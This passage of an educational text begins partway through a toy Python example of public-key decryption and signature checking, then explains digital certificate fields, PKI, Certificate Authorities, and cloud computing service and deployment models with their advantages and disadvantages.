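# Bob: decrypt with PrivB, then verify the hash sum with PubA.
recovered = pow(ciphertext, *priv_b)
assert recovered == message
assert pow(signature, *pub_a) == hash_sum(b"42", pub_a[1])
```

The encryption gives confidentiality (only Bob can read it); the signed hash gives integrity
and sender authentication (only Alice could have produced it).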

What is a Digital Certificate?


The data structure used to transport and validate keys is called a digital certificate. A
certificate protects the key by guaranteeing the identity of the issuer, the identity of the
owner, and the purposes for which the key can be used. A certificate cannot be forged
undetected, because the issuing authority digitally signs it. The signature is applied to a
hash of the certificate. This enables clients to validate the issuer's identity and detect any
alteration. The client decrypts the signed hash using the issuer's public key and then
compares the result to a separate hash it computes over the certificate. If the results match,
the certificate is valid.
A Digital Certificate contains the following fields (some are optional).

Issued By: The Certification Authority (CA) that issued the digital certificate.

Issued To: The recipient that obtained the digital certificate. If the recipient is a user, the name
can be the user's logon ID, User Principal Name (UPN), or Distinguished Name (DN).

Intended Uses (OID): A certificate has one or more uses. This shows the intended uses of the
certificate.

Version: The certificate version. Windows Certification Authority (CA) servers issue X.509
Version 3 certificates.

Serial Number: This is a sequential number assigned by the CA to the certificate. The number is
unique and acts as a validity check.
Signature Algorithm: The hashing algorithm used to do the digital signature for the certificate.
This is typically either SHA-1 or MD5.

Issuer: This is the X.500 distinguished name of the issuing server.

Valid From: This is the issue date of the certificate.

Valid To: This important field defines the expiry date of the certificate.

Subject: This is the X.500 distinguished name of the certificate's owner.

Public Key: This field contains the public key.

CA Version: This field contains the version number (number of times the authorization
certificate for a particular Certification Authority (CA) has been renewed).

Subject Key Identifier: This field contains an SHA-1 hash of the Public Key field used to
uniquely identify the contents. This prevents alteration of the public key.

Certificate Template: This field is a Microsoft extension that contains the name of the
template used by the CA to generate this certificate.

Key Usage: This field contains the OIDs of the purposes for the certificate.

Authority Key Identifier: Contains an SHA-1 hash of the public key of the issuing CA along
with the distinguished name of the CA.

CRL Distribution Points (CDPs): CRL (Certificate Revocation List) information listed by LDAP
path, URL, and file share name.

Authority Information Access: Information for a client to find the certificate of the issuing CA.

Thumbprint: A hash of the certificate.

Thumbprint Algorithm: The algorithm used to obtain the certificate hash.

What is Public Key Infrastructure (PKI)? Confidentiality, Authentication, Integrity,
Non-Repudiation
A Public Key Infrastructure (PKI) is the set of hardware, software, people, policies, and
procedures needed to create, manage, store, distribute, and revoke digital certificates. A
Public Key Infrastructure (PKI) enables users of an inherently insecure public network, such
as the Internet, to securely and privately exchange data through the use of a public and a
private cryptographic key pair that is obtained and shared through a trusted authority.

The following are the major functions of Public Key Infrastructure (PKI).

Confidentiality: The privacy of user transactions is protected by encrypting data streams and
messages. The confidentiality function may be intended to prevent the unauthorized disclosure of
information locally or across a network. By using Public Key Infrastructure (PKI), users are able
to ensure that only an intended recipient can “unlock” (decrypt) an encrypted message.

Authentication: Authentication is the process of verifying that the user is who they say they are.
PKI provides a means for senders and recipients to validate each other's identities.

Integrity: Guaranteeing message integrity is another important function of Public Key
Infrastructure (PKI). Public Key Infrastructure (PKI) has built-in ways to validate that all
the outputs are equivalent to the inputs. Any alteration of the data can be immediately
detected.

Non-Repudiation: Public Key Infrastructure (PKI) ensures that an author cannot deny having
signed or encrypted a particular message once it has been sent, assuming the private key is
secured. Digital signatures link senders to their messages: only the holder of the private key
could have signed a message with it, so all messages signed with the sender's private key
originated with that specific individual.

What is a Certificate Authority (CA)? Functions of a Certificate Authority (CA)

A Certificate Authority (CA) is a trusted entity that issues digital certificates and
public-private key pairs. The role of the Certificate Authority (CA) is to guarantee that the
individual granted the unique certificate is, in fact, who he or she claims to be.

The Certificate Authority (CA) verifies that the owner of the certificate is who he says he is. A
Certificate Authority (CA) can be a trusted third party which is responsible for physically
verifying the legitimacy of the identity of an individual or organization before issuing a digital
certificate.

A Certificate Authority (CA) can be an external (public) Certificate Authority (CA) such as
VeriSign, Thawte, or Comodo, or an internal (private) Certificate Authority (CA) configured
inside our network.
Certificate Authority (CA) is a critical security service in a network. A Certificate Authority
(CA) performs the following functions.

Certificate Authority (CA) Verifies the identity: The Certificate Authority (CA) must validate
the identity of the entity who requested a digital certificate before issuing it.

Certificate Authority (CA) issues digital certificates: Once the validation process is over, the
Certificate Authority (CA) issues the digital certificate to the entity who requested it. Digital
certificates can be used for encryption (Example: Encrypting web traffic), code signing,
authentication etc.

Certificate Authority (CA) maintains the Certificate Revocation List (CRL): The Certificate
Authority (CA) maintains a Certificate Revocation List (CRL). A CRL is a list of digital
certificates that have been revoked and are no longer valid, and therefore should not be
relied upon by anyone.

What Is Cloud Computing?


What is the cloud? Where is the cloud? Are we in the cloud now? These are all questions you've
probably heard or even asked yourself. The term "cloud computing" is everywhere.
In the simplest terms, cloud computing means storing and accessing data and programs over the
Internet instead of your computer's hard drive. The cloud is just a metaphor for the Internet. It
goes back to the days of flowcharts and presentations that would represent the gigantic server-
farm infrastructure of the Internet as nothing but a puffy, white cumulus cloud, accepting
connections and doling out information as it floats.
What cloud computing is not about is your hard drive. When you store data on or run programs
from the hard drive, that's called local storage and computing. Everything you need is physically
close to you, which means accessing your data is fast and easy, for that one computer, or others
on the local network. Working off your hard drive is how the computer industry functioned for
decades; some would argue it's still superior to cloud computing, for reasons I'll explain shortly.
The cloud is also not about having a dedicated network attached storage (NAS) hardware or
server in residence. Storing data on a home or office network does not count as utilizing the
cloud. (However, some NAS will let you remotely access things over the Internet, and there's at
least one brand from Western Digital named "My Cloud," just to keep things confusing.)
For it to be considered "cloud computing," you need to access your data or your programs over
the Internet, or at the very least, have that data synced with other information over the Web. In a
big business, you may know all there is to know about what's on the other side of the connection;
as an individual user, you may never have any idea what kind of massive data processing is
happening on the other end. The end result is the same: with an online connection, cloud
computing can be done anywhere, anytime.
Consumer vs. Business
Let's be clear here. We're talking about cloud computing as it impacts individual consumers—
those of us who sit back at home or in small-to-medium offices and use the Internet on a regular
basis.
There is an entirely different "cloud" when it comes to business. Some businesses choose to
implement
• Software-as-a-Service (SaaS), where the business subscribes to an application it
accesses over the Internet. (Think Salesforce.com.)
• There's also Platform-as-a-Service (PaaS), where a business can create its own custom
applications for use by all in the company.
• And don't forget the mighty Infrastructure-as-a-Service (IaaS), where players like
Amazon, Microsoft, Google, and Rackspace provide a backbone that can be "rented out"
by other companies. (For example, Netflix provides services to you because it's a
customer of the cloud services at Amazon.)
Of course, cloud computing is big business: by one estimate, the market generated $100 billion
in 2012 and was projected to reach $127 billion by 2017 and $500 billion by 2020.

Simply put, cloud computing is the delivery of computing services—servers, storage, databases,
networking, software, analytics, and more—over the Internet (“the cloud”). Companies offering
these computing services are called cloud providers and typically charge for cloud computing
services based on usage, similar to how you’re billed for water or electricity at home.
Uses of cloud computing
You’re probably using cloud computing right now, even if you don’t realize it. If you use an
online service to send email, edit documents, watch movies or TV, listen to music, play games,
or store pictures and other files, it’s likely that cloud computing is making it all possible behind
the scenes. The first cloud computing services are barely a decade old, but already a variety of
organizations—from tiny startups to global corporations, government agencies to non-profits—
are embracing the technology for all sorts of reasons. Here are a few of the things you can do
with the cloud:

• Create new apps and services


• Store, back up, and recover data
• Host websites and blogs
• Stream audio and video
• Deliver software on demand
• Analyze data for patterns and make predictions

Top benefits of cloud computing


Cloud computing is a big shift from the traditional way businesses think about IT resources.
Why is cloud computing so popular? Here are six common reasons organizations are turning to
cloud computing services:
1. Cost
Cloud computing eliminates the capital expense of buying hardware and software and setting up and
running on-site datacenters—the racks of servers, the round-the-clock electricity for power and
cooling, the IT experts for managing the infrastructure. It adds up fast.

2. Speed
Most cloud computing services are provided self-service and on demand, so even vast amounts of
computing resources can be provisioned in minutes, typically with just a few mouse clicks,
giving businesses a lot of flexibility and taking the pressure off capacity planning.

3. Global scale
The benefits of cloud computing services include the ability to scale elastically. In cloud
speak, that means delivering the right amount of IT resources—for example, more or less
computing power, storage, bandwidth—right when it's needed, and from the right geographic
location.

4. Productivity
On-site datacenters typically require a lot of “racking and stacking”—hardware set up, software
patching, and other time-consuming IT management chores. Cloud computing removes the need for
many of these tasks, so IT teams can spend time on achieving more important business goals.

5. Performance
The biggest cloud computing services run on a worldwide network of secure datacenters, which are
regularly upgraded to the latest generation of fast and efficient computing hardware. This offers
several benefits over a single corporate datacenter, including reduced network latency for
applications and greater economies of scale.

6. Reliability
Cloud computing makes data backup, disaster recovery, and business continuity easier and less
expensive, because data can be mirrored at multiple redundant sites on the cloud provider’s network.

Types of cloud services: IaaS, PaaS, SaaS


Most cloud computing services fall into three broad categories: infrastructure as a service
(IaaS), platform as a service (PaaS), and software as a service (SaaS). These are sometimes
called the cloud computing stack, because they build on top of one another. Knowing what they
are and how they’re different makes it easier to accomplish your business goals.
Infrastructure-as-a-service (IaaS)
The most basic category of cloud computing services. With IaaS, you rent IT
infrastructure—servers and virtual machines (VMs), storage, networks, operating systems—from a
cloud provider on a pay-as-you-go basis.
Platform as a service (PaaS)
Platform-as-a-service (PaaS) refers to cloud computing services that supply an on-demand
environment for developing, testing, delivering, and managing software applications. PaaS is
designed to make it easier for developers to quickly create web or mobile apps, without
worrying about setting up or managing the underlying infrastructure of servers, storage,
network, and databases needed for development.
Software as a service (SaaS)
Software-as-a-service (SaaS) is a method for delivering software applications over the
Internet, on demand and typically on a subscription basis. With SaaS, cloud providers host and
manage the software application and underlying infrastructure, and handle any maintenance,
like software upgrades and security patching. Users connect to the application over the
Internet, usually with a web browser on their phone, tablet, or PC.

Types of cloud deployments: public, private, hybrid


Not all clouds are the same. There are three different ways to deploy cloud computing resources:
public cloud, private cloud, and hybrid cloud.

Public cloud
Public clouds are owned and operated by a third-party cloud service provider, which delivers
its computing resources, such as servers and storage, over the Internet. Microsoft Azure is an
example of a public cloud. With a public cloud, all hardware, software, and other supporting
infrastructure is owned and managed by the cloud provider. You access these services and
manage your account using a web browser.

Private cloud
A private cloud refers to cloud computing resources used exclusively by a single business or
organization. A private cloud can be physically located on the company’s on-site datacenter. Some
companies also pay third-party service providers to host their private cloud. A private cloud is one in
which the services and infrastructure are maintained on a private network.

Hybrid cloud
Hybrid clouds combine public and private clouds, bound together by technology that allows data and
applications to be shared between them. By allowing data and applications to move between private
and public clouds, hybrid cloud gives businesses greater flexibility and more deployment options.
Cloud computing, often referred to as simply “the cloud,” is the delivery of on-demand computing
resources—everything from applications to data centers—over the internet on a pay-for-use basis.
• Elastic resources—Scale up or down quickly and easily to meet demand
• Metered service so you only pay for what you use
• Self-service—All the IT resources you need with self-service access

Software as a service (SaaS)


Cloud-based applications—or software as a service—run on distant computers “in the cloud” that
are owned and operated by others and that connect to users’ computers via the internet and, usually,
a web browser.
The benefits of SaaS
• You can sign up and rapidly start using innovative business apps
• Apps and data are accessible from any connected computer
• No data is lost if your computer breaks, as data is in the cloud
• The service is able to dynamically scale to usage needs
With SaaS, you no longer have to purchase, install, update and maintain the software.

Platform as a service (PaaS)


Platform as a service provides a cloud-based environment with everything required to support the
complete lifecycle of building and delivering web-based (cloud) applications—without the cost and
complexity of buying and managing the underlying hardware, software, provisioning, and hosting.
The benefits of PaaS
• Develop applications and get to market faster
• Deploy new web applications to the cloud in minutes
• Reduce complexity with middleware as a service

Infrastructure as a service (IaaS)


Infrastructure as a service provides companies with computing resources including servers,
networking, storage, and data center space on a pay-per-use basis.
The benefits of IaaS
• No need to invest in your own hardware
• Infrastructure scales on demand to support dynamic workloads
• Flexible, innovative services available on demand

Public cloud
Public clouds are owned and operated by companies that offer rapid access over a public network to
affordable computing resources. With public cloud services, users don’t need to purchase hardware,
software, or supporting infrastructure, which is owned and managed by providers.
Key aspects of public cloud
• Innovative SaaS business apps for applications ranging from customer resource
management (CRM) to transaction management and data analytics
• Flexible, scalable IaaS for storage and compute services on a moment’s notice
• Powerful PaaS for cloud-based application development and deployment environments

Private cloud
A private cloud is infrastructure operated solely for a single organization, whether managed
internally or by a third party, and hosted either internally or externally. Private clouds can take
advantage of cloud’s efficiencies, while providing more control of resources and steering clear of
multi-tenancy.
Key aspects of private cloud
• A self-service interface controls services, allowing IT staff to quickly provision, allocate,
and deliver on-demand IT resources
• Highly automated management of resource pools for everything from compute capability
to storage, analytics, and middleware
• Sophisticated security and governance designed for a company’s specific requirements

Hybrid cloud
A hybrid cloud uses a private cloud foundation combined with the strategic integration and use of
public cloud services. The reality is a private cloud can’t exist in isolation from the rest of a
company’s IT resources and the public cloud. Most companies with private clouds will evolve to
manage workloads across data centers, private clouds, and public clouds—thereby creating hybrid
clouds.
Key aspects of hybrid cloud
• Allows companies to keep the critical applications and sensitive data in a traditional data
center environment or private cloud
• Enables taking advantage of public cloud resources like SaaS, for the latest applications,
and IaaS, for elastic virtual resources
• Facilitates portability of data, apps and services and more choices for deployment models

Advantages of Cloud Computing


For start-up businesses the cloud offers an essential differentiator. For the first time, anyone with an
idea can start a business and get it up and running quickly on an enterprise-grade IT infrastructure
that’s flexible enough to accommodate growth, yet requires minimal up-front capital expenditure.
For small to medium sized businesses that have limited IT resources, the cloud allows you to focus
on running your business rather than your IT. You can take advantage of a wide portfolio of
compute, storage and network products, then cost effectively scale on-demand as your business
grows — often while delivering faster time to market than previously achievable.
Mid to large enterprises often face complex hosting needs, varying departmental and corporate-wide
infrastructure requirements, high traffic websites and demanding applications. For them, the cloud
can often drive down costs and deliver increased operational efficiency, productivity, agility and
flexibility.
Advantages of Cloud Computing at a Glance:
• Drive down costs: Avoid large capital expenditure on hardware and upgrades. Cloud can
also improve cost efficiency by more closely matching your cost pattern to your
revenue/demand pattern, moving your business from a capital-intensive cost model to an
Opex model.
• Cope with demand: You know what infrastructure you need today, but what about your
future requirements? As your business grows, a cloud environment should grow with
you. And when demand is unpredictable or you need to test a new application, you have
the ability to spin capacity up or down, while paying only for what you use.
• Run your business; don’t worry about your IT: Monitoring your infrastructure 24/7 is
time consuming and expensive when you have a business to run. A managed cloud
solution means that your hosting provider is doing this for you. In addition to monitoring
your infrastructure and keeping your data safe, they can provide creative and practical
solutions to your needs, as well as expert advice to keep your IT infrastructure working
efficiently as your needs evolve.
• Innovate and lead: Ever-changing business requirements mean that your IT
infrastructure has to be flexible. With a cloud infrastructure, you can rapidly deploy new
projects and take them live quickly, keeping you at the vanguard of innovation in your
sector.
• Improved security and compliance: You have to protect your business against loss of
revenue and brand damage. In addition, many organizations face strict regulatory and
compliance obligations. A cloud environment means that this responsibility no longer
rests entirely on your shoulders. Your cloud hosting provider will build in resiliency and
agility at an infrastructure-level to limit the risk of a security breach, and will work with
you to help address compliance and regulatory requirements.
• Reduce your carbon footprint: Hosting in a data center rather than onsite allows you to
take advantage of the latest energy-efficient technology. Additionally, as cloud service
providers host multiple customers on shared infrastructure, they can drive higher and
more efficient utilization of energy resources.
• Future-proof your business: There is unprecedented demand for access to data
anywhere, any time and on any device. Don’t let your business fall behind. By embracing
the cloud, you can handle emerging mobile, BYOD and wearable technology trends.
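The "cope with demand" point above can be sketched as a toy autoscaling rule. This is a simplified illustration, not any provider's actual scaling algorithm: the target utilization, bounds, and function name are assumptions made for this example.

```python
import math

# Hypothetical sketch of elastic capacity: scale the instance count so that
# average CPU utilization moves toward a target, within fixed bounds.

def scale(current_instances: int, cpu_utilization: float,
          target: float = 0.6, min_n: int = 1, max_n: int = 10) -> int:
    """Return the desired instance count given average CPU utilization (0..1)."""
    desired = math.ceil(current_instances * cpu_utilization / target)
    # Clamp to the allowed range so we never scale to zero or beyond budget.
    return max(min_n, min(max_n, desired))

print(scale(4, 0.9))   # heavy load -> scale up (4 * 0.9 / 0.6 = 6)
print(scale(4, 0.15))  # mostly idle -> scale down to the minimum
```

Because you pay per instance, scaling down when idle is what turns capacity into an operational cost that tracks demand.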

Advantages and Disadvantages of Cloud Computing


There is no doubt that businesses can reap huge benefits from cloud computing. However, with
the many advantages, come some drawbacks as well. Take time to understand the advantages
and disadvantages of cloud computing, so that you can get the most out of your business
technology, whichever cloud provider you choose.
Advantages of Cloud Computing
Cost Savings
Perhaps the most significant cloud computing benefit is IT cost savings. Businesses,
no matter their type or size, exist to earn money while keeping capital and operational
expenses to a minimum. With cloud computing, you can save substantial capital costs because there are
no in-house server storage and application requirements. The lack of on-premises infrastructure also
removes the associated operational costs of power, air conditioning and
administration. You pay for what is used and disengage whenever you like; there is no
invested IT capital to worry about. It is a common misconception that only large businesses can
afford to use the cloud, when in fact, cloud services are extremely affordable for smaller
businesses.
Reliability
With a managed service platform, cloud computing is much more reliable and consistent than in-
house IT infrastructure. Most providers offer a Service Level Agreement that guarantees
24/7/365 service and 99.99% availability. Your organization can benefit from a massive pool of
redundant IT resources, as well as quick failover mechanisms: if a server fails, hosted
applications and services can easily be moved to any of the available servers.
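The failover behavior described above can be sketched as a simple retry loop over a server pool. This is a minimal illustration of the idea, assuming a caller-supplied `send` function; real cloud platforms do this with load balancers and health checks rather than client-side loops.

```python
# Hypothetical sketch: if one server fails, fail over to the next one
# in the pool and return the first successful response.

def call_with_failover(servers, request, send):
    """Try each server in turn; return the first successful response."""
    last_error = None
    for server in servers:
        try:
            return send(server, request)
        except ConnectionError as err:
            last_error = err  # server down -> try the next one
    raise RuntimeError("all servers unavailable") from last_error

# Example: the first server is down, the second responds.
def fake_send(server, request):
    if server == "srv-a":
        raise ConnectionError("srv-a is down")
    return f"{server}: ok"

print(call_with_failover(["srv-a", "srv-b"], "GET /", fake_send))  # srv-b: ok
```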

Manageability
Cloud computing provides enhanced and simplified IT management and maintenance
capabilities through central administration of resources, vendor-managed infrastructure and SLA-
backed service delivery. IT infrastructure updates and maintenance are eliminated, as all resources
are maintained by the service provider. You enjoy a simple web-based user interface for
accessing software, applications and services, without the need for installation, and an SLA
ensures the timely and guaranteed delivery, management and maintenance of your IT services.

Strategic Edge
Ever-increasing computing resources give you a competitive edge, as the time
you require for IT procurement is virtually nil. Your company can deploy mission-critical
applications that deliver significant business benefits, with no upfront costs and minimal
provisioning time. Cloud computing allows you to forget about technology and focus on your
key business activities and objectives. It can also help you reduce the time to market for
new applications and services.

Disadvantages of Cloud Computing


Downtime
As cloud service providers serve a large number of clients each day, they can become
overwhelmed and may even come up against technical outages. This can lead to your business
processes being temporarily suspended. Additionally, if your internet connection is offline, you
will not be able to access any of your applications, servers or data in the cloud.
Security
Although cloud service providers implement the best security standards and industry
certifications, storing data and important files on external service providers always opens up
risks. Using cloud-powered technologies means you need to provide your service provider with
access to important business data. Meanwhile, being a public service opens up cloud service
providers to security challenges on a routine basis. The ease in procuring and accessing cloud
services can also give nefarious users the ability to scan, identify and exploit loopholes and
vulnerabilities within a system. For instance, in a multi-tenant cloud architecture where multiple
users are hosted on the same server, a hacker might try to break into the data of other users
hosted and stored on the same server. However, such exploits are uncommon, and the likelihood
of a compromise is low.

Vendor Lock-In
Although cloud service providers promise that the cloud will be flexible to use and integrate,
switching between cloud services has not yet fully matured. Organizations may
find it difficult to migrate their services from one vendor to another. Hosting and integrating
current cloud applications on another platform may raise interoperability and support issues.
For instance, applications developed on Microsoft Development Framework (.Net) might not
work properly on the Linux platform.

Limited Control
Since the cloud infrastructure is entirely owned, managed and monitored by the service provider,
the customer retains minimal control. The customer can only control and manage the
applications, data and services operated on top of it, not the backend infrastructure itself. Key
administrative tasks such as server shell access, updating and firmware management may not be
passed to the customer or end user.

It is easy to see that the advantages of cloud computing outweigh the drawbacks.
Decreased costs, reduced downtime, and less management effort are benefits that speak for
themselves.

The cloud gives you the freedom to have your apps, data and services where they are most effective, delivering value faster.
